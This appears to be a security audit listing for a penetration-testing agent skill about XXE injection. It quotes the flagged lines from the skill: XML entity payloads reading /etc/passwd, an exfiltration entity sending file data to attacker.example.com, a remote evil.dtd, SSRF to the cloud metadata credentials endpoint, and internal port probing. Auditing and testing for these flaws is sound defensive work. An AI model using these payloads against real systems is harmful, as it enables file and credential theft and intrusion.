testing-for-xxe-injection-vulnerabilities
Enables security professionals to discover and exploit XML External Entity injection vulnerabilities during penetration tests.
Install this skill
Security score
The testing-for-xxe-injection-vulnerabilities skill was audited on Jun 5, 2026 and we found 33 security issues across 2 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
Access to /etc/passwd
| 90 | # Basic XXE payload to read /etc/passwd |
Access to /etc/passwd
| 95 | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
Access to /etc/passwd
| 204 | <!ENTITY % file SYSTEM "file:///etc/passwd"> |
Access to /etc/passwd
| 223 | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
Access to /etc/passwd
| 313 | A SOAP web service processes XML input without disabling external entities. Injecting a DTD with a SYSTEM entity in the SOAP body reads `/etc/passwd` and returns it in the SOAP response. |
Access to /etc/passwd
| 336 | 2. Include DTD with external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
Access to /etc/passwd
| 341 | - Local file read: /etc/passwd, /etc/hostname, application config files |
Access to /etc/passwd
| 348 | | /etc/passwd | 42 user accounts, service accounts identified | |
External URL reference
| 65 | "https://target.example.com/api/search" |
External URL reference
| 71 | "https://target.example.com/api/search" |
External URL reference
| 81 | -d '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><test/></soap:Body></soap:Envelope>' \ |
External URL reference
| 82 | "https://target.example.com/ws/service" |
External URL reference
| 98 | "https://target.example.com/api/search" |
External URL reference
| 108 | "https://target.example.com/api/search" |
External URL reference
| 118 | "https://target.example.com/api/search" |
External URL reference
| 128 | "https://target.example.com/api/search" |
External URL reference
| 144 | <!ENTITY xxe SYSTEM "http://abc123.oast.fun/xxe-test"> |
External URL reference
| 147 | "https://target.example.com/api/search" |
External URL reference
| 156 | <!ENTITY xxe SYSTEM "http://xxe-confirmed.abc123.oast.fun"> |
External URL reference
| 159 | "https://target.example.com/api/search" |
External URL reference
| 166 | <!ENTITY % xxe SYSTEM "http://abc123.oast.fun/xxe-param"> |
External URL reference
| 170 | "https://target.example.com/api/search" |
External URL reference
| 182 | <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.example.com/?data=%file;'>"> |
External URL reference
| 195 | <!ENTITY % dtd SYSTEM "http://attacker.example.com:8888/evil.dtd"> |
External URL reference
| 199 | "https://target.example.com/api/search" |
External URL reference
| 225 | <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200"> |
External URL reference
| 234 | "https://target.example.com/api/upload/avatar" |
External URL reference
| 260 | <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> |
External URL reference
| 263 | "https://target.example.com/api/search" |
External URL reference
| 270 | -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:$port/\">]><root><search>&xxe;</search></root>" \ |
External URL reference
| 271 | "https://target.example.com/api/search" | head -c 100 |
External URL reference
| 280 | <!ENTITY xxe SYSTEM "http://internal-admin.local:8080/admin"> |
External URL reference
| 283 | "https://target.example.com/api/search" |